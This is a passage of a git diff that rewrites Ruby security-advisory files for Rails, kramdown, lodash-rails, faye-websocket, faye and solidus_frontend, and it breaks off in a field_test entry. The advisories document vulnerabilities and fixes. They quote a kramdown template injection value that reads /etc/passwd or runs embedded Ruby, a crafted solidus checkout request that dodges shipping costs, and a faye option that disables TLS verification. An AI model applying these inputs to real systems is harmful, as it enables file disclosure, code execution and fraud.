-  in production'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2020-8185
-  ghsa: c6qr-h5vq-59jc
-  url: https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0
-  title: Untrusted users able to run pending migrations in production
-  date: 2020-06-17
-  description: |
-    There is a vulnerability in versions of Rails prior to 6.0.3.2 that allowed
-    an untrusted user to run any pending migrations on a Rails app running in
-    production.
-
-    This vulnerability has been assigned the CVE identifier CVE-2020-8185.
-
-    Versions Affected:  6.0.0 < rails < 6.0.3.2
-    Not affected:       Applications with `config.action_dispatch.show_exceptions = false` (this is not a default setting in production)
-    Fixed Versions:     rails >= 6.0.3.2
-
-    Impact
-    ------
-
-    Using this issue, an attacker would be able to execute any migrations that
-    are pending for a Rails app running in production mode. It is important to
-    note that an attacker is limited to running migrations the application
-    developer has already defined in their application and ones that have not
-    already ran.
-
-    Workarounds
-    -----------
-
-    Until such time as the patch can be applied, application developers should
-    disable the ActionDispatch middleware in their production environment via
-    a line such as this one in their config/environment/production.rb:
-
-    `config.middleware.delete ActionDispatch::ActionableExceptions`
-  cvss_v3: 6.5
-  unaffected_versions:
-  - "< 6.0.0"
-  patched_versions:
-  - ">= 6.0.3.2"
----
+---
+layout: advisory
+title: 'CVE-2020-8185 (actionpack): Untrusted users able to run pending migrations
+  in production'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2020-8185
+  ghsa: c6qr-h5vq-59jc
+  url: https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0
+  title: Untrusted users able to run pending migrations in production
+  date: 2020-06-17
+  description: |
+    There is a vulnerability in versions of Rails prior to 6.0.3.2 that allowed
+    an untrusted user to run any pending migrations on a Rails app running in
+    production.
+
+    This vulnerability has been assigned the CVE identifier CVE-2020-8185.
+
+    Versions Affected:  6.0.0 < rails < 6.0.3.2
+    Not affected:       Applications with `config.action_dispatch.show_exceptions = false` (this is not a default setting in production)
+    Fixed Versions:     rails >= 6.0.3.2
+
+    Impact
+    ------
+
+    Using this issue, an attacker would be able to execute any migrations that
+    are pending for a Rails app running in production mode. It is important to
+    note that an attacker is limited to running migrations the application
+    developer has already defined in their application and ones that have not
+    already ran.
+
+    Workarounds
+    -----------
+
+    Until such time as the patch can be applied, application developers should
+    disable the ActionDispatch middleware in their production environment via
+    a line such as this one in their config/environment/production.rb:
+
+    `config.middleware.delete ActionDispatch::ActionableExceptions`
+  cvss_v3: 6.5
+  unaffected_versions:
+  - "< 6.0.0"
+  patched_versions:
+  - ">= 6.0.3.2"
+---
diff --git a/advisories/_posts/2020-06-28-CVE-2020-14001.md b/advisories/_posts/2020-06-28-CVE-2020-14001.md
index f49c39e0..0b5bc4e9 100644
--- a/advisories/_posts/2020-06-28-CVE-2020-14001.md
+++ b/advisories/_posts/2020-06-28-CVE-2020-14001.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2020-14001 (kramdown): Unintended read access in kramdown gem'
-comments: false
-categories:
-- kramdown
-advisory:
-  gem: kramdown
-  cve: 2020-14001
-  ghsa: mqm2-cgpr-p4m6
-  date: 2020-06-28
-  url: https://github.com/advisories/GHSA-mqm2-cgpr-p4m6
-  title: Unintended read access in kramdown gem
-  description: |
-    The kramdown gem before 2.3.0 for Ruby processes the template option inside
-    Kramdown documents by default, which allows unintended read access (such as
-    template="/etc/passwd") or unintended embedded Ruby code execution (such as a
-    string that begins with template="string://<%= `). NOTE: kramdown is used in
-    Jekyll, GitLab Pages, GitHub Pages, and Thredded Forum.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.3.0"
----
+---
+layout: advisory
+title: 'CVE-2020-14001 (kramdown): Unintended read access in kramdown gem'
+comments: false
+categories:
+- kramdown
+advisory:
+  gem: kramdown
+  cve: 2020-14001
+  ghsa: mqm2-cgpr-p4m6
+  date: 2020-06-28
+  url: https://github.com/advisories/GHSA-mqm2-cgpr-p4m6
+  title: Unintended read access in kramdown gem
+  description: |
+    The kramdown gem before 2.3.0 for Ruby processes the template option inside
+    Kramdown documents by default, which allows unintended read access (such as
+    template="/etc/passwd") or unintended embedded Ruby code execution (such as a
+    string that begins with template="string://<%= `). NOTE: kramdown is used in
+    Jekyll, GitLab Pages, GitHub Pages, and Thredded Forum.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.3.0"
+---
diff --git a/advisories/_posts/2020-07-15-CVE-2020-8203.md b/advisories/_posts/2020-07-15-CVE-2020-8203.md
index df449c78..9ac62353 100644
--- a/advisories/_posts/2020-07-15-CVE-2020-8203.md
+++ b/advisories/_posts/2020-07-15-CVE-2020-8203.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2020-8203 (lodash-rails): Prototype Pollution in lodash'
-comments: false
-categories:
-- lodash-rails
-advisory:
-  gem: lodash-rails
-  cve: 2020-8203
-  ghsa: p6mc-m468-83gw
-  url: https://github.com/advisories/GHSA-p6mc-m468-83gw
-  title: Prototype Pollution in lodash
-  date: 2020-07-15
-  description: |
-    Versions of lodash prior to 4.17.19 are vulnerable to Prototype
-    Pollution. The functions `pick`, `set`, `setWith`, `update`,
-    `updateWith`, and `zipObjectDeep` allow a malicious user to
-    modify the prototype of Object if the property identifiers are
-    user-supplied. Being affected by this issue requires manipulating
-    objects based on user-provided property values or arrays.
-
-    This vulnerability causes the addition or modification of an
-    existing property that will exist on all objects and may lead to
-    Denial of Service or Code Execution under specific circumstances.
-  cvss_v2: 5.8
-  cvss_v3: 7.4
-  unaffected_versions:
-  - "< 3.7.0"
-  patched_versions:
-  - ">= 4.17.19"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-8203
-    - https://hackerone.com/reports/712065
-    - https://github.com/lodash/lodash/issues/4744
-    - https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12
-    - https://github.com/lodash/lodash/issues/4874
-    - https://github.com/github/advisory-database/pull/2884
-    - https://hackerone.com/reports/864701
-    - https://github.com/lodash/lodash/wiki/Changelog#v41719
-    - https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744
-    - https://security.netapp.com/advisory/ntap-20200724-0006
-    - https://github.com/advisories/GHSA-p6mc-m468-83gw
----
+---
+layout: advisory
+title: 'CVE-2020-8203 (lodash-rails): Prototype Pollution in lodash'
+comments: false
+categories:
+- lodash-rails
+advisory:
+  gem: lodash-rails
+  cve: 2020-8203
+  ghsa: p6mc-m468-83gw
+  url: https://github.com/advisories/GHSA-p6mc-m468-83gw
+  title: Prototype Pollution in lodash
+  date: 2020-07-15
+  description: |
+    Versions of lodash prior to 4.17.19 are vulnerable to Prototype
+    Pollution. The functions `pick`, `set`, `setWith`, `update`,
+    `updateWith`, and `zipObjectDeep` allow a malicious user to
+    modify the prototype of Object if the property identifiers are
+    user-supplied. Being affected by this issue requires manipulating
+    objects based on user-provided property values or arrays.
+
+    This vulnerability causes the addition or modification of an
+    existing property that will exist on all objects and may lead to
+    Denial of Service or Code Execution under specific circumstances.
+  cvss_v2: 5.8
+  cvss_v3: 7.4
+  unaffected_versions:
+  - "< 3.7.0"
+  patched_versions:
+  - ">= 4.17.19"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8203
+    - https://hackerone.com/reports/712065
+    - https://github.com/lodash/lodash/issues/4744
+    - https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12
+    - https://github.com/lodash/lodash/issues/4874
+    - https://github.com/github/advisory-database/pull/2884
+    - https://hackerone.com/reports/864701
+    - https://github.com/lodash/lodash/wiki/Changelog#v41719
+    - https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744
+    - https://security.netapp.com/advisory/ntap-20200724-0006
+    - https://github.com/advisories/GHSA-p6mc-m468-83gw
+---
diff --git a/advisories/_posts/2020-07-31-CVE-2020-15133.md b/advisories/_posts/2020-07-31-CVE-2020-15133.md
index 32be6ddf..726dd254 100644
--- a/advisories/_posts/2020-07-31-CVE-2020-15133.md
+++ b/advisories/_posts/2020-07-31-CVE-2020-15133.md
@@ -1,107 +1,107 @@
----
-layout: advisory
-title: 'CVE-2020-15133 (faye-websocket): Missing TLS certificate verification in faye-websocket'
-comments: false
-categories:
-- faye-websocket
-advisory:
-  gem: faye-websocket
-  cve: 2020-15133
-  ghsa: 2v5c-755p-p4gv
-  url: https://github.com/faye/faye-websocket-ruby/security/advisories/GHSA-2v5c-755p-p4gv
-  date: 2020-07-31
-  title: Missing TLS certificate verification in faye-websocket
-  description: |
-    The `Faye::WebSocket::Client` class uses the [`EM::Connection#start_tls`][1]
-    method in [EventMachine][2] to implement the TLS handshake whenever a `wss:` URL
-    is used for the connection. This method does not implement certificate
-    verification by default, meaning that it does not check that the server presents
-    a valid and trusted TLS certificate for the expected hostname. That means that
-    any `wss:` connection made using this library is vulnerable to a
-    man-in-the-middle attack, since it does not confirm the identity of the server
-    it is connected to.
-
-    This has been a requested feature in EventMachine for many years now; see for
-    example [#275][3], [#378][4], and [#814][5]. In June 2020, [em-http-request][6]
-    published an [advisory][7] related to this problem and fixed it by [implementing
-    TLS verification][8] in their own codebase; although EventMachine does not
-    implement certificate verification itself, it provides an extension point for
-    the caller to implement it, called [`ssl_verify_peer`][9]. Based on this
-    implementation, we have incorporated similar functionality into [faye-websocket
-    for Ruby][10], such that we use the `OpenSSL` module to perform two checks:
-
-    - The chain of certificates presented by the server is valid and ultimately
-      trusted by your root certificate set -- either your system default root
-      certificates, or a set provided at runtime
-    - The final certificate presented by the server is valid for the hostname used
-      in the request URI; if the connection is made via a proxy we use the hostname
-      from the request, not the proxy's hostname
-
-    After implementing verification in v1.1.6, em-http-request has elected to leave
-    the `:verify_peer` option switched off by default. We have decided to _enable_
-    this option by default in faye-websocket, but are publishing a minor release
-    with added functionality for configuring it. We are mindful of the fact that
-    this may break existing programs, but we consider it much more important that
-    all clients have TLS verification turned on by default. A client that is not
-    carrying out verification is either:
-
-    - talking to the expected server, and will not break under this change
-    - being attacked, and would benefit from being alerted to this fact
-    - deliberately talking to a server that would be rejected by verification
-
-    The latter case includes situations like talking to a non-public server using a
-    self-signed certificate. We consider this use case to be "working by accident",
-    rather than functionality that was actively supported, and it should be properly
-    and explicitly supported instead. To that end, we have added two new options to
-    the `Faye::WebSocket::Client` constructor: `tls.root_cert_file`, and
-    `tls.verify_peer`.
-
-    The `:root_cert_file` option lets you provide a different set of root
-    certificates in situations where you don't want to use your system's default
-    root certificates to verify the remote host. It should be a path or an array of
-    paths identifying the certificates to use instead of the defaults.
-
-    ```rb
-    client = Faye::WebSocket::Client.new('wss://example.com/', [], tls: {
-      root_cert_file: 'path/to/certificate.pem'
-    })
-    ```
-
-    The `:verify_peer` option lets you turn verification off entirely. This should
-    be a last resort and we recommend using the `:root_cert_file` option if
-    possible.
-
-    ```rb
-    client = Faye::WebSocket::Client.new('wss://example.com/', [], tls: {
-      verify_peer: false
-    })
-    ```
-
-    To get the new behaviour, please upgrade to v0.11.0 of the [Rubygems
-    package][10]. There are, unfortunately, no workarounds for this issue, as you
-    cannot enable `:verify_peer` in EventMachine unless the calling library contains
-    an implementation of `ssl_verify_peer` that actually checks the server's
-    certificates.
-
-    For further background information on this issue, please see [faye#524][12] and
-    [faye-websocket#129][13]. We would like to thank [Tero Marttila][14] and [Daniel
-    Morsing][15] for providing invaluable assistance and feedback on this issue.
-
-    [1]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls
-    [2]: https://rubygems.org/gems/eventmachine
-    [3]: https://github.com/eventmachine/eventmachine/issues/275
-    [4]: https://github.com/eventmachine/eventmachine/pull/378
-    [5]: https://github.com/eventmachine/eventmachine/issues/814
-    [6]: https://rubygems.org/gems/em-http-request
-    [7]: https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request
-    [8]: https://github.com/igrigorik/em-http-request/pull/340
-    [9]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer
-    [10]: https://rubygems.org/gems/faye-websocket
-    [12]: https://github.com/faye/faye/issues/524
-    [13]: https://github.com/faye/faye-websocket-ruby/pull/129
-    [14]: https://github.com/SpComb
-    [15]: https://github.com/DanielMorsing
-  cvss_v3: 8.0
-  patched_versions:
-  - ">= 0.11.0"
----
+---
+layout: advisory
+title: 'CVE-2020-15133 (faye-websocket): Missing TLS certificate verification in faye-websocket'
+comments: false
+categories:
+- faye-websocket
+advisory:
+  gem: faye-websocket
+  cve: 2020-15133
+  ghsa: 2v5c-755p-p4gv
+  url: https://github.com/faye/faye-websocket-ruby/security/advisories/GHSA-2v5c-755p-p4gv
+  date: 2020-07-31
+  title: Missing TLS certificate verification in faye-websocket
+  description: |
+    The `Faye::WebSocket::Client` class uses the [`EM::Connection#start_tls`][1]
+    method in [EventMachine][2] to implement the TLS handshake whenever a `wss:` URL
+    is used for the connection. This method does not implement certificate
+    verification by default, meaning that it does not check that the server presents
+    a valid and trusted TLS certificate for the expected hostname. That means that
+    any `wss:` connection made using this library is vulnerable to a
+    man-in-the-middle attack, since it does not confirm the identity of the server
+    it is connected to.
+
+    This has been a requested feature in EventMachine for many years now; see for
+    example [#275][3], [#378][4], and [#814][5]. In June 2020, [em-http-request][6]
+    published an [advisory][7] related to this problem and fixed it by [implementing
+    TLS verification][8] in their own codebase; although EventMachine does not
+    implement certificate verification itself, it provides an extension point for
+    the caller to implement it, called [`ssl_verify_peer`][9]. Based on this
+    implementation, we have incorporated similar functionality into [faye-websocket
+    for Ruby][10], such that we use the `OpenSSL` module to perform two checks:
+
+    - The chain of certificates presented by the server is valid and ultimately
+      trusted by your root certificate set -- either your system default root
+      certificates, or a set provided at runtime
+    - The final certificate presented by the server is valid for the hostname used
+      in the request URI; if the connection is made via a proxy we use the hostname
+      from the request, not the proxy's hostname
+
+    After implementing verification in v1.1.6, em-http-request has elected to leave
+    the `:verify_peer` option switched off by default. We have decided to _enable_
+    this option by default in faye-websocket, but are publishing a minor release
+    with added functionality for configuring it. We are mindful of the fact that
+    this may break existing programs, but we consider it much more important that
+    all clients have TLS verification turned on by default. A client that is not
+    carrying out verification is either:
+
+    - talking to the expected server, and will not break under this change
+    - being attacked, and would benefit from being alerted to this fact
+    - deliberately talking to a server that would be rejected by verification
+
+    The latter case includes situations like talking to a non-public server using a
+    self-signed certificate. We consider this use case to be "working by accident",
+    rather than functionality that was actively supported, and it should be properly
+    and explicitly supported instead. To that end, we have added two new options to
+    the `Faye::WebSocket::Client` constructor: `tls.root_cert_file`, and
+    `tls.verify_peer`.
+
+    The `:root_cert_file` option lets you provide a different set of root
+    certificates in situations where you don't want to use your system's default
+    root certificates to verify the remote host. It should be a path or an array of
+    paths identifying the certificates to use instead of the defaults.
+
+    ```rb
+    client = Faye::WebSocket::Client.new('wss://example.com/', [], tls: {
+      root_cert_file: 'path/to/certificate.pem'
+    })
+    ```
+
+    The `:verify_peer` option lets you turn verification off entirely. This should
+    be a last resort and we recommend using the `:root_cert_file` option if
+    possible.
+
+    ```rb
+    client = Faye::WebSocket::Client.new('wss://example.com/', [], tls: {
+      verify_peer: false
+    })
+    ```
+
+    To get the new behaviour, please upgrade to v0.11.0 of the [Rubygems
+    package][10]. There are, unfortunately, no workarounds for this issue, as you
+    cannot enable `:verify_peer` in EventMachine unless the calling library contains
+    an implementation of `ssl_verify_peer` that actually checks the server's
+    certificates.
+
+    For further background information on this issue, please see [faye#524][12] and
+    [faye-websocket#129][13]. We would like to thank [Tero Marttila][14] and [Daniel
+    Morsing][15] for providing invaluable assistance and feedback on this issue.
+
+    [1]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls
+    [2]: https://rubygems.org/gems/eventmachine
+    [3]: https://github.com/eventmachine/eventmachine/issues/275
+    [4]: https://github.com/eventmachine/eventmachine/pull/378
+    [5]: https://github.com/eventmachine/eventmachine/issues/814
+    [6]: https://rubygems.org/gems/em-http-request
+    [7]: https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request
+    [8]: https://github.com/igrigorik/em-http-request/pull/340
+    [9]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer
+    [10]: https://rubygems.org/gems/faye-websocket
+    [12]: https://github.com/faye/faye/issues/524
+    [13]: https://github.com/faye/faye-websocket-ruby/pull/129
+    [14]: https://github.com/SpComb
+    [15]: https://github.com/DanielMorsing
+  cvss_v3: 8.0
+  patched_versions:
+  - ">= 0.11.0"
+---
diff --git a/advisories/_posts/2020-07-31-CVE-2020-15134.md b/advisories/_posts/2020-07-31-CVE-2020-15134.md
index a3e07938..d89de864 100644
--- a/advisories/_posts/2020-07-31-CVE-2020-15134.md
+++ b/advisories/_posts/2020-07-31-CVE-2020-15134.md
@@ -1,105 +1,105 @@
----
-layout: advisory
-title: 'CVE-2020-15134 (faye): Missing TLS certificate verification'
-comments: false
-categories:
-- faye
-advisory:
-  gem: faye
-  cve: 2020-15134
-  ghsa: 3q49-h8f9-9fr9
-  url: https://github.com/faye/faye/security/advisories/GHSA-3q49-h8f9-9fr9
-  date: 2020-07-31
-  title: Missing TLS certificate verification
-  description: |
-    Faye uses [em-http-request][6] and [faye-websocket][10] in the Ruby version of
-    its client. Those libraries both use the [`EM::Connection#start_tls`][1] method
-    in [EventMachine][2] to implement the TLS handshake whenever a `wss:` URL is
-    used for the connection. This method does not implement certificate verification
-    by default, meaning that it does not check that the server presents a valid and
-    trusted TLS certificate for the expected hostname. That means that any `https:`
-    or `wss:` connection made using these libraries is vulnerable to a
-    man-in-the-middle attack, since it does not confirm the identity of the server
-    it is connected to.
-
-    The first request a Faye client makes is always sent via normal HTTP, but later
-    messages may be sent via WebSocket. Therefore it is vulnerable to the same
-    problem that these underlying libraries are, and we needed both libraries to
-    support TLS verification before Faye could claim to do the same. Your client
-    would still be insecure if its initial HTTPS request was verified, but later
-    WebSocket connections were not.
-
-    This has been a requested feature in EventMachine for many years now; see for
-    example [#275][3], [#378][4], and [#814][5]. In June 2020, em-http-request
-    published an [advisory][7] related to this problem and fixed it by [implementing
-    TLS verification][8] in their own codebase; although EventMachine does not
-    implement certificate verification itself, it provides an extension point for
-    the caller to implement it, called [`ssl_verify_peer`][9]. Based on this
-    implementation, we have incorporated similar functionality into faye-websocket.
-
-    After implementing verification in v1.1.6, em-http-request has elected to leave
-    the `:verify_peer` option switched off by default. We have decided to _enable_
-    this option by default in Faye, but are publishing a minor release with added
-    functionality for configuring it. We are mindful of the fact that this may break
-    existing programs, but we consider it much more important that all clients have
-    TLS verification turned on by default. A client that is not carrying out
-    verification is either:
-
-    - talking to the expected server, and will not break under this change
-    - being attacked, and would benefit from being alerted to this fact
-    - deliberately talking to a server that would be rejected by verification
-
-    The latter case includes situations like talking to a non-public server using a
-    self-signed certificate. We consider this use case to be "working by accident",
-    rather than functionality that was actively supported, and it should be properly
-    and explicitly supported instead.
-
-    We are releasing Faye v1.4.0, which enables verification by default and provides
-    a way to opt out of it:
-
-    ```rb
-    client = Faye::Client.new('https://example.com/', tls: { verify_peer: false })
-    ```
-
-    Unfortunately we can't offer an equivalent of the `:root_cert_file` option that
-    has been added to faye-websocket, because em-http-request does not support it.
-    If you need to talk to servers whose certificates are not recognised by your
-    default root certificates, then you need to add its certificate (or another one
-    that can verify it) to your system's root set.
-
-    The same functionality is now supported in the Node.js version, with a `tls`
-    option whose values will be passed to the `https` and `tls` modules as
-    appropriate when making connections. For example, you can provide your own CA
-    certificate:
-
-    ```js
-    var client = new faye.Client('https://example.com/', {
-      tls: {
-        ca: fs.readFileSync('path/to/certificate.pem')
-      }
-    });
-    ```
-
-    For further background information on this issue, please see [faye#524][12] and
-    [faye-websocket#129][13]. We would like to thank [Tero Marttila][14] and [Daniel
-    Morsing][15] for providing invaluable assistance and feedback on this issue.
-
-    [1]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls
-    [2]: https://rubygems.org/gems/eventmachine
-    [3]: https://github.com/eventmachine/eventmachine/issues/275
-    [4]: https://github.com/eventmachine/eventmachine/pull/378
-    [5]: https://github.com/eventmachine/eventmachine/issues/814
-    [6]: https://rubygems.org/gems/em-http-request
-    [7]: https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request
-    [8]: https://github.com/igrigorik/em-http-request/pull/340
-    [9]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer
-    [10]: https://rubygems.org/gems/faye-websocket
-    [11]: https://faye.jcoglan.com/
-    [12]: https://github.com/faye/faye/issues/524
-    [13]: https://github.com/faye/faye-websocket-ruby/pull/129
-    [14]: https://github.com/SpComb
-    [15]: https://github.com/DanielMorsing
-  cvss_v3: 8.0
-  patched_versions:
-  - ">= 1.4.0"
----
+---
+layout: advisory
+title: 'CVE-2020-15134 (faye): Missing TLS certificate verification'
+comments: false
+categories:
+- faye
+advisory:
+  gem: faye
+  cve: 2020-15134
+  ghsa: 3q49-h8f9-9fr9
+  url: https://github.com/faye/faye/security/advisories/GHSA-3q49-h8f9-9fr9
+  date: 2020-07-31
+  title: Missing TLS certificate verification
+  description: |
+    Faye uses [em-http-request][6] and [faye-websocket][10] in the Ruby version of
+    its client. Those libraries both use the [`EM::Connection#start_tls`][1] method
+    in [EventMachine][2] to implement the TLS handshake whenever a `wss:` URL is
+    used for the connection. This method does not implement certificate verification
+    by default, meaning that it does not check that the server presents a valid and
+    trusted TLS certificate for the expected hostname. That means that any `https:`
+    or `wss:` connection made using these libraries is vulnerable to a
+    man-in-the-middle attack, since it does not confirm the identity of the server
+    it is connected to.
+
+    The first request a Faye client makes is always sent via normal HTTP, but later
+    messages may be sent via WebSocket. Therefore it is vulnerable to the same
+    problem that these underlying libraries are, and we needed both libraries to
+    support TLS verification before Faye could claim to do the same. Your client
+    would still be insecure if its initial HTTPS request was verified, but later
+    WebSocket connections were not.
+
+    This has been a requested feature in EventMachine for many years now; see for
+    example [#275][3], [#378][4], and [#814][5]. In June 2020, em-http-request
+    published an [advisory][7] related to this problem and fixed it by [implementing
+    TLS verification][8] in their own codebase; although EventMachine does not
+    implement certificate verification itself, it provides an extension point for
+    the caller to implement it, called [`ssl_verify_peer`][9]. Based on this
+    implementation, we have incorporated similar functionality into faye-websocket.
+
+    After implementing verification in v1.1.6, em-http-request has elected to leave
+    the `:verify_peer` option switched off by default. We have decided to _enable_
+    this option by default in Faye, but are publishing a minor release with added
+    functionality for configuring it. We are mindful of the fact that this may break
+    existing programs, but we consider it much more important that all clients have
+    TLS verification turned on by default. A client that is not carrying out
+    verification is either:
+
+    - talking to the expected server, and will not break under this change
+    - being attacked, and would benefit from being alerted to this fact
+    - deliberately talking to a server that would be rejected by verification
+
+    The latter case includes situations like talking to a non-public server using a
+    self-signed certificate. We consider this use case to be "working by accident",
+    rather than functionality that was actively supported, and it should be properly
+    and explicitly supported instead.
+
+    We are releasing Faye v1.4.0, which enables verification by default and provides
+    a way to opt out of it:
+
+    ```rb
+    client = Faye::Client.new('https://example.com/', tls: { verify_peer: false })
+    ```
+
+    Unfortunately we can't offer an equivalent of the `:root_cert_file` option that
+    has been added to faye-websocket, because em-http-request does not support it.
+    If you need to talk to servers whose certificates are not recognised by your
+    default root certificates, then you need to add its certificate (or another one
+    that can verify it) to your system's root set.
+
+    The same functionality is now supported in the Node.js version, with a `tls`
+    option whose values will be passed to the `https` and `tls` modules as
+    appropriate when making connections. For example, you can provide your own CA
+    certificate:
+
+    ```js
+    var client = new faye.Client('https://example.com/', {
+      tls: {
+        ca: fs.readFileSync('path/to/certificate.pem')
+      }
+    });
+    ```
+
+    For further background information on this issue, please see [faye#524][12] and
+    [faye-websocket#129][13]. We would like to thank [Tero Marttila][14] and [Daniel
+    Morsing][15] for providing invaluable assistance and feedback on this issue.
+
+    [1]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls
+    [2]: https://rubygems.org/gems/eventmachine
+    [3]: https://github.com/eventmachine/eventmachine/issues/275
+    [4]: https://github.com/eventmachine/eventmachine/pull/378
+    [5]: https://github.com/eventmachine/eventmachine/issues/814
+    [6]: https://rubygems.org/gems/em-http-request
+    [7]: https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request
+    [8]: https://github.com/igrigorik/em-http-request/pull/340
+    [9]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer
+    [10]: https://rubygems.org/gems/faye-websocket
+    [11]: https://faye.jcoglan.com/
+    [12]: https://github.com/faye/faye/issues/524
+    [13]: https://github.com/faye/faye-websocket-ruby/pull/129
+    [14]: https://github.com/SpComb
+    [15]: https://github.com/DanielMorsing
+  cvss_v3: 8.0
+  patched_versions:
+  - ">= 1.4.0"
+---
diff --git a/advisories/_posts/2020-08-04-CVE-2020-15109.md b/advisories/_posts/2020-08-04-CVE-2020-15109.md
index f0247372..c56a2294 100644
--- a/advisories/_posts/2020-08-04-CVE-2020-15109.md
+++ b/advisories/_posts/2020-08-04-CVE-2020-15109.md
@@ -1,77 +1,77 @@
----
-layout: advisory
-title: 'CVE-2020-15109 (solidus_frontend): Ability to change order address without
-  triggering address validations in solidus'
-comments: false
-categories:
-- solidus_frontend
-advisory:
-  gem: solidus_frontend
-  cve: 2020-15109
-  ghsa: 3mvg-rrrw-m7ph
-  url: https://github.com/solidusio/solidus/security/advisories/GHSA-3mvg-rrrw-m7ph
-  date: 2020-08-04
-  title: Ability to change order address without triggering address validations in
-    solidus
-  description: |
-    ### Impact
-    This vulnerability allows a malicious customer to craft request data with
-    parameters that allow changing the address of the current order without
-    changing the shipment costs associated with the new shipment.
-
-    All stores with at least two shipping zones and different costs of shipment
-    per zone are impacted.
-
-    E.g.
-
-    1. Store admin configured the store so that there are two zones in US:
-       * East Cost Zone - Shipping Method cost: $1
-       * West Cost Zone - Shipping Method cost: $10
-
-    The attacker user can know that shipping to NY is less expensive than to LA
-    just by testing different addresses in checkout.
-
-    2. The attacker user enters any NY shipping address in the address step
-    3. The attacker user chooses the $1 delivery option
-    4. The attacker user crafts a request with their real LA address, similar to:
-
-    ```
-    // POST #checkout/update:
-
-    {
-      state: 'payment',
-      order: {
-        ship_address_attributes: {
-          city: 'Los Angeles',
-          ...
-        }
-      }
-    }
-    ```
-
-    5. The attacker user proceeds with checking out with a new address and the $1
-    shipment costs.
-
-    Another scenario where this could be dangerous is:
-
-    > You cannot ship products in some zones and you are relying on Solidus
-    > Shipping Method building only to filter out unwanted zones. Malicious
-    > users can enter an allowed zone's address and change back to an unwanted
-    > one in the payment step by crafting a request with some proper
-    > ship_address_attributes.
-
-    This problem comes from how checkout permitted attributes are structured.
-    We have a single list of attributes that are permitted across the whole
-    checkout, no matter the step that is being submitted.
-
-    ### Workarounds
-    When it's not possible to upgrade to a supported patched version, please
-    use this gist to patch the store:
-
-    https://gist.github.com/kennyadsl/4618cd9797984cb64f7700a81bda889d
-  cvss_v3: 5.3
-  patched_versions:
-  - "~> 2.8.6"
-  - "~> 2.9.6"
-  - ">= 2.10.2"
----
+---
+layout: advisory
+title: 'CVE-2020-15109 (solidus_frontend): Ability to change order address without
+  triggering address validations in solidus'
+comments: false
+categories:
+- solidus_frontend
+advisory:
+  gem: solidus_frontend
+  cve: 2020-15109
+  ghsa: 3mvg-rrrw-m7ph
+  url: https://github.com/solidusio/solidus/security/advisories/GHSA-3mvg-rrrw-m7ph
+  date: 2020-08-04
+  title: Ability to change order address without triggering address validations in
+    solidus
+  description: |
+    ### Impact
+    This vulnerability allows a malicious customer to craft request data with
+    parameters that allow changing the address of the current order without
+    changing the shipment costs associated with the new shipment.
+
+    All stores with at least two shipping zones and different costs of shipment
+    per zone are impacted.
+
+    E.g.
+
+    1. Store admin configured the store so that there are two zones in US:
+       * East Cost Zone - Shipping Method cost: $1
+       * West Cost Zone - Shipping Method cost: $10
+
+    The attacker user can know that shipping to NY is less expensive than to LA
+    just by testing different addresses in checkout.
+
+    2. The attacker user enters any NY shipping address in the address step
+    3. The attacker user chooses the $1 delivery option
+    4. The attacker user crafts a request with their real LA address, similar to:
+
+    ```
+    // POST #checkout/update:
+
+    {
+      state: 'payment',
+      order: {
+        ship_address_attributes: {
+          city: 'Los Angeles',
+          ...
+        }
+      }
+    }
+    ```
+
+    5. The attacker user proceeds with checking out with a new address and the $1
+    shipment costs.
+
+    Another scenario where this could be dangerous is:
+
+    > You cannot ship products in some zones and you are relying on Solidus
+    > Shipping Method building only to filter out unwanted zones. Malicious
+    > users can enter an allowed zone's address and change back to an unwanted
+    > one in the payment step by crafting a request with some proper
+    > ship_address_attributes.
+
+    This problem comes from how checkout permitted attributes are structured.
+    We have a single list of attributes that are permitted across the whole
+    checkout, no matter the step that is being submitted.
+
+    ### Workarounds
+    When it's not possible to upgrade to a supported patched version, please
+    use this gist to patch the store:
+
+    https://gist.github.com/kennyadsl/4618cd9797984cb64f7700a81bda889d
+  cvss_v3: 5.3
+  patched_versions:
+  - "~> 2.8.6"
+  - "~> 2.9.6"
+  - ">= 2.10.2"
+---
diff --git a/advisories/_posts/2020-08-04-CVE-2020-16252.md b/advisories/_posts/2020-08-04-CVE-2020-16252.md
index 0dee680b..4f41c3f1 100644
--- a/advisories/_posts/2020-08-04-CVE-2020-16252.md
+++ b/advisories/_posts/2020-08-04-CVE-2020-16252.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2020-16252 (field_test): CSRF Vulnerability with Non-Session Based Authentication'
-comments: false
-categories:
-- field_test
-advisory:
-  gem: field_test
-  cve: 2020-16252
